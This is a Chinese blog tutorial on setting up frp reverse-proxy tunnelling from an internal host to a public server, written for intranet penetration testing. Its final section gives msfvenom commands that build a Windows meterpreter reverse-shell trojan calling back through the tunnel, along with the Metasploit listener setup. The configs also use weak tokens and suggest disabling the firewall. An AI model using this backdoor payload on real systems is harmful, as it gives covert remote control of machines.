目錄

Frp（簡易上線）

1、簡述：

2、工具：

3、使用：

1、準備：

2、服務(wù)端（公網(wǎng)）：

2、客戶端（內(nèi)網(wǎng)）：

3、測試方法：

4、生成后門木馬監(jiān)聽：

---

Frp（簡易上線）

1、簡述：

1）Frp (Fast Reverse Proxy) 是一個免費開源的用于內(nèi)網(wǎng)穿透的反向代理應(yīng)用，它支持 TCP、UDP 協(xié)議， 也為 HTTP、HTTPS 協(xié)議提供了額外的支持。

---

2）frp：服務(wù)端（裝在公網(wǎng)ip的服務(wù)器上）+客戶端（裝在內(nèi)網(wǎng)主機上）

---

3）中轉(zhuǎn)站功能：實現(xiàn)公網(wǎng) ←→ FRP(服務(wù)器) ←→ 內(nèi)網(wǎng) 的連接（可以將內(nèi)網(wǎng)服務(wù)以安全、便捷的方式通過具有公網(wǎng)IP節(jié)點的中轉(zhuǎn)暴露到公網(wǎng)。）

---

4）原理：

第一步：服務(wù)端：運行，并監(jiān)聽端口，等待客戶端連接

第二步：客戶端：連接服務(wù)端的端口，告訴服務(wù)端要監(jiān)聽的端口和轉(zhuǎn)發(fā)類型

第三步：服務(wù)端：創(chuàng)建新的進程，監(jiān)聽客戶端指定的端口

第四步：外網(wǎng)用戶：連接到客戶端指定的端口，服務(wù)端通過和客戶端的連接將數(shù)據(jù)轉(zhuǎn)發(fā)到客戶端

第五步：客戶端：進程將數(shù)據(jù)轉(zhuǎn)發(fā)到本地服務(wù)

2、工具：

URL：https://github.com/fatedier/frp

選擇合適的版本

Releases · fatedier/frp (github.com)https://github.com/fatedier/frp/releases

3、使用：

1、準備：

1）準備一個域名（注冊一個，直接使用ip也可）

2）準備一個服務(wù)器（阿里云、騰訊云等都可以免費領(lǐng)一個月）

3）VM中搭建一個虛擬機（內(nèi)網(wǎng)環(huán)境）

4）測試連通性，使用Xshell，或者準備一臺非同一局域網(wǎng)下主機并使用ssh命令

5）下載frp工具

命令行輸入： wget https://github.com/fatedier/frp/releases/download/v0.46.1/frp_0.46.1_linux_arm64.tar.gz

（下載太慢了，我直接下載到電腦上，然后使用xshell配套的xftp傳上去）

先解壓后再上傳的話

1：上傳到客戶端上面的（即內(nèi)網(wǎng)主機）

2：上傳到服務(wù)端上面的（即公網(wǎng)服務(wù)器）

?

s結(jié)尾代表server（服務(wù)端）

c結(jié)尾代表client（客戶端）

——————

4）文件解壓?

如果直接使用的命令下載的，就需要解壓

tar -zxvf frp_0.46.1_linux_amd64.tar.gz

方法一：然后把服務(wù)端的文件cp出來（或刪掉客戶端文件）

sudo mkdir 創(chuàng)建文件夾 sudo cp 原文件的位置 將要復(fù)制到的位置

方法二：直接刪除客戶端文件

rm frpc rm frpc.ini rm frpc_full.ini

解壓之后文件夾改個名，方便操作

——————

5）文件添加權(quán)限（客戶端、服務(wù)端）

cd /usr/local/frp sudo chmod 777 frpc （777為所有權(quán)限，也可以換為+x可執(zhí)行權(quán)限，熟悉Linux的就不用多說了）

---

2、服務(wù)端（公網(wǎng)）：

1）修改配置文件（frps.ini）

編輯文件內(nèi)容 vim ./frps.ini 配置文件內(nèi)容 [common] bind_port = 7000 # 服務(wù)端與客戶端通信端口 dashboard_port = 7500 # 后臺管理端口 dashboard_user = admin # 后臺登錄用戶名 dashboard_pwd = adminvhost_http_port = 7002 # http穿透端口 vhost_https_port = 7003 # https穿透端口 max_pool_count = 50token = 123456 # 身份驗證令牌，frpc要與frps一致 tcp_mux = truelog_file = /usr/local/frp/frps.log # 日志相關(guān)配置 log_level = info log_max_days = 3authentication_timeout = 0 # 服務(wù)器與客戶端時間相差15min會連接失敗，0表示不驗證 subdomain_host = …… # 填寫自己注冊的域名 privilege_mode = true

——————

2）訪問的端口開發(fā)

（以騰訊云為例）

方法一：

直接在服務(wù)器控制臺上添加規(guī)則

方法二：

Linux使用命令行添加

# 添加監(jiān)聽端口 sudo firewall-cmd --permanent --add-port=7000/tcp # 添加管理后臺端口 sudo firewall-cmd --permanent --add-port=7500/tcp sudo firewall-cmd --reload

方法三：

使用ufw、iptables工具

方法四：

直接關(guān)閉防火墻

——————

3）啟動服務(wù)端：

./frps -c ./frps.ini

啟動成功

——————

4）訪問后臺管理界面

服務(wù)器ip（或者域名）:port（7500）

并使用自己設(shè)置的用戶名，密碼登陸

————

擴展：

關(guān)閉窗口會停止

所以，需要后臺運行

nohup ./frps -c frps.ini &

---

2、客戶端（內(nèi)網(wǎng)）：

1）解壓、保留客戶端配置文件

——————

2）修改配置文件

編輯配置文件 vim ./frpc.ini # 客戶端配置 [common] server_addr = …… # 公網(wǎng)服務(wù)器ip server_port = 7000 # 公網(wǎng)服務(wù)端通信端口，與frps.ini的bind_port一致token = 123456 # 身份驗證令牌，與服務(wù)端的frps.ini中token一致） tcp_mux = truelog_file = /usr/local/frp/frpc.log # 日志相關(guān) log_level = info log_max_days = 3 authentication_timeout = 0 # 服務(wù)器與客戶端時間相差15min會連接失敗，0表示不驗證# 配置ssh服務(wù) [ssh] # 添加ssh節(jié)點 type = tcp local_ip = 192.168.xxx.xxx # 或者127.0.0.1 local_port = 22 remote_port = 7001 # 指明由公網(wǎng)服務(wù)器的7001端口代理（ssh連接端口，遠程服務(wù)端口）# 配置http服務(wù)，可用于其他開發(fā) [web01] # 添加web節(jié)點 type = http local_ip = 192.168.xxx.xxx # 或者127.0.0.1 local_port = 8080 # 本地8080端口（自定義的tomcat服務(wù)）可以通公網(wǎng)服務(wù)器7002端口訪問 subdomain = web01 # 自定義子域名

——————

3）防火墻端口開放

開放方法和服務(wù)端類似

——————

4）客戶端啟動

./frpc -c frpc.ini

---

3、測試方法：

方法一：

直接使用Xshell工具，對公網(wǎng)服務(wù)器進行連接（公網(wǎng)服務(wù)器ip）

端口設(shè)置為客戶端指定的服務(wù)器代理端口（remote_port = 7001）

————

方法二：

使用不在同一局域網(wǎng)下的電腦

ssh admin@***.*.*.* -p 端口# -p 指定服務(wù)器端口號，不指定端口則默認22，但此處修改為我們設(shè)置的ssh服務(wù)端口7001 # admin 為登錄的用戶名 # ***.*.*.* 為公網(wǎng)服務(wù)器ip/域名

————

注：

如果報錯Connection closed by……

1、授予ssh權(quán)限

2、開啟ssh服務(wù)

---

4、生成后門木馬監(jiān)聽：

msfvenom -p windows/meterpreter/reverse_tcp lhost=公網(wǎng)服務(wù)器ip lport=服務(wù)端代理客戶端的端口（即remote_port ） -f exe -o frp.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555

（注：這個監(jiān)聽端口lport，與本地轉(zhuǎn)發(fā)端口一致）
exploit

總結(jié)

以上是生活随笔為你收集整理的【内网安全-隧道搭建】内网穿透_Frp上线、测试的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。